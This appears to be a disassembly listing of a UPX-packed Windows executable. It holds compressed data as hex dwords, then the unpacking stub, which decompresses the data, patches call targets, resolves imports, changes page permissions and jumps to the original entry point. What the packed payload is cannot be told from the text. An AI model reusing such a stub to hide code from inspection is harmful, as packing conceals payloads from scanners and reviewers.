dd 8BBB7FEDh, 6163737Ch, 43141C54h, 636D6D6Fh, 0B3897274h
dd 0C041BDh, 65749AC7h, 8081086Dh, 7100299Bh, 0A84D331Dh
dd 4029768Dh, 6F046761h, 0DBFE5F4Bh, 731E6A24h, 69746341h
dd 2A586576h, 0DC656853h, 6CFB7ED6h, 4950416Ch, 6552BB0Ah
dd 8465367h, 0EDCC273Fh, 653CD9B6h, 4D5555EFh, 7110636Fh
dd 0DC35CCF6h, 9D736E02h, 0C0A5A9Dh, 0ADB93C28h, 736CC014h
dd 0CA1E464Fh, 88DD6DCh, 5A551C02h, 0FF00636Ch, 0C8209BB2h
dd 1C2040Dh, 74726956h, 70D46175h, 516CFCBFh, 79726575h
dd 65656C53h, 8D330670h, 0A1103637h, 69457441h, 6E887562h
dd 661ADE37h, 6C754D13h, 0C79420Fh, 0BDD16F54h, 432A020Bh
dd 14726168h, 76A2106Fh, 1F297CAFh, 36F26547h, 45767808h
dd 68540E78h, 5880643Eh, 10C58A84h, 838041B1h, 36722E05h
dd 0C8CC5B6Eh, 54643D0Fh, 64FB4865h, 0F65A0830h, 0B01D1141h
dd 1359B31Bh, 6F66C740h, 0ACC5550Fh, 1E69541Dh, 0C6D6F30Dh
dd 440DEA82h, 795490AFh, 0A1216770h, 43122282h, 0BDB6F49Bh
dd 460A4950h, 74616D31h, 366D1A53h, 5246E9BBh, 0F778654Eh
dd 0F73D030Eh, 0FCE6B03h, 736F6C43h, 0B0D81174h, 77EE158h
dd 7A180E89h, 441DB6B0h, 165C4428h, 6756E45h, 7257342Bh
dd 0C53140C1h, 0A10E1944h, 3889AA95h, 984F2543h, 630C96F0h
dd 0C1D8A411h, 35286554h, 8D928754h, 3422F925h, 4182470Ch
dd 2B42042Ch, 545106F8h, 7B151498h, 1C00C0F0h, 61B56DAAh
dd 6449A84Fh, 69709198h, 0CD5CB9ADh, 355D7357h, 2191E65h
dd 1576B2BAh, 8B25F845h, 1F159480h, 948C10ECh, 0C916B1Ah
dd 960BDEC8h, 0D218C7BBh, 461630C2h, 2160779Dh, 8C8C9184h
dd 0B3EC2297h, 0D94640CDh, 70630941h, 0C36D0A79h, 624106F1h
dd 2A72D997h, 8C294042h, 1013AC79h, 7BBA1318h, 0B9BDB170h
dd 0AF230903h, 823240F1h, 6E8BB7BDh, 8196FF2Eh, 25B62C61h
dd 898D69B3h, 0C6026557h, 17739EEEh, 8D686E55h, 37064964h
dd 0A31762ACh, 0A4D8DD0h, 450FAC28h, 0BB3EDB9Ch, 37664F29h
dd 3A6C7452h, 920A5F77h, 41983B5h, 6B696114h, 6CD8BE48h
dd 0EE641210h, 6453260Dh, 0E619929Ch, 0C6CE770Ch, 0D51CD383h
dd 58C19FF0h, 7E087784h, 6211E10Fh, 4F4DBEC3h, 654B6E4Ch
dd 8B490E79h, 0FE673B0h, 0D336A846h, 0E2AE9F6Bh, 4E5770F1h
dd 5597257Bh, 41D9BDBAh, 732C0A0Eh, 0BDB30E6Fh, 12268BD8h
dd 0EA391738h, 4E142C64h, 6926AD90h, 65A59BDEh, 58EC0FBCh
dd 89C29CF4h, 0E1261159h, 281D4868h, 5A829620h, 9DE808CCh
dd 0BFBDB825h
dd 7343B997h, 0C13A16AFh, 2C286F14h, 3DA61ADBh, 913E0F64h
dd 0D5F733B5h, 0BD4C464Ah, 0A9161658h, 36C20EBDh, 5B6E4C23h
dd 11312C8h, 6CC194A6h, 1836DBD2h, 64596F62h, 0E28157Eh
dd 0EEC0E04Fh, 486F4219h, 9C0F677Bh, 3E411C54h, 1620E580h
dd 3A09612Eh, 5839BE58h, 12226D74h, 45504263h, 7AB7A089h
dd 6F08014Ch, 0D12A425Eh, 0FF56C40h, 0B818F00h, 0A0820201h
dd 49BE841Bh, 16AF06D2h, 51580DB0h, 0B40ECEEh, 99D97002h
dd 0C4B724Bh, 341E0120h, 0DF26C164h, 46103340h, 0BDD12002h
dd 9CED0CBh, 69103714h, 1F920659h, 0D640001h, 636018F0h
dd 4F43201Fh, 9FEB4544h, 6C96FC90h, 0CAC4A0D9h, 4144600Bh
dd 0E90B4154h, 1B8CF7BEh, 0A42706FBh, 77B1CD20h, 5342C0DEh
dd 6457653h, 4E054BC0h, 2EC0AAC9h, 7361870Ch, 0F360DD25h
dd 400A27D0h, 0D09C26CEh, 9008E474h, 3BE6B44Fh, 18724019h
dd 6581F027h, 400292B9h, 90BA6550h, 4BC261EEh, 0B6270EB5h
dd 0E942612h, 93A46D73h, 0ECADFBFCh, 0A81B27C4h, 16720DD2h
dd 1, 0
dd 0FF0012h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
var_AC = byte ptr -0ACh
pusha
mov esi, offset dword_40D000
lea edi, [esi-0C000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_413212
; ---------------------------------------------------------------------------
align 8
loc_413208: ; CODE XREF: start:loc_413219�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_41320E: ; CODE XREF: start+B6�j start+CD�j
add ebx, ebx
jnz short loc_413219
loc_413212: ; CODE XREF: start+10�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413219: ; CODE XREF: start+20�j
jb short loc_413208
mov eax, 1
loc_413220: ; CODE XREF: start+3F�j start+4A�j
add ebx, ebx
jnz short loc_41322B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41322B: ; CODE XREF: start+32�j
adc eax, eax
add ebx, ebx
jnb short loc_413220
jnz short loc_41323C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_413220
loc_41323C: ; CODE XREF: start+41�j
xor ecx, ecx
sub eax, 3
jb short loc_413250
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4132C2
mov ebp, eax
loc_413250: ; CODE XREF: start+51�j
add ebx, ebx
jnz short loc_41325B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41325B: ; CODE XREF: start+62�j
adc ecx, ecx
add ebx, ebx
jnz short loc_413268
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413268: ; CODE XREF: start+6F�j
adc ecx, ecx
jnz short loc_41328C
inc ecx
loc_41326D: ; CODE XREF: start+8C�j start+97�j
add ebx, ebx
jnz short loc_413278
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413278: ; CODE XREF: start+7F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_41326D
jnz short loc_413289
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_41326D
loc_413289: ; CODE XREF: start+8E�j
add ecx, 2
loc_41328C: ; CODE XREF: start+7A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4132AC
loc_41329D: ; CODE XREF: start+B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_41329D
jmp loc_41320E
; ---------------------------------------------------------------------------
align 4
loc_4132AC: ; CODE XREF: start+AB�j start+C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4132AC
add edi, ecx
jmp loc_41320E
; ---------------------------------------------------------------------------
loc_4132C2: ; CODE XREF: start+5C�j
pop esi
mov edi, esi
mov ecx, 45Eh
loc_4132CA: ; CODE XREF: start+E1�j start+E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_4132CF: ; CODE XREF: start+104�j
cmp al, 1
ja short loc_4132CA
cmp byte ptr [edi], 0
jnz short loc_4132CA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_4132CF
lea edi, [esi+11000h]
loc_4132FC: ; CODE XREF: start+12E�j
mov eax, [edi]
or eax, eax
jz short loc_41333E
mov ebx, [edi+4]
lea eax, [eax+esi+131E8h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+13274h]
xchg eax, ebp
loc_413319: ; CODE XREF: start+146�j
mov al, [edi]
inc edi
or al, al
jz short loc_4132FC
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+13278h]
or eax, eax
jz short loc_413338
mov [ebx], eax
add ebx, 4
jmp short loc_413319
; ---------------------------------------------------------------------------
loc_413338: ; CODE XREF: start+13F�j
call dword ptr [esi+13280h]
loc_41333E: ; CODE XREF: start+110�j
mov ebp, [esi+1327Ch]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+21Fh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_413372: ; CODE XREF: start+186�j
push 0
cmp esp, eax
jnz short loc_413372
sub esp, 0FFFFFF80h
jmp sub_40AF30
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd 0
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsStart dd 2 dup(0) ; DATA XREF: UPX1:TlsDirectory�o
TlsEnd dd 318h dup(0) ; DATA XREF: UPX1:TlsEnd_ptr�o
UPX1 ends
; Section 4. (virtual address 00015000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 415000h
align 2000h
_idata2 ends
end start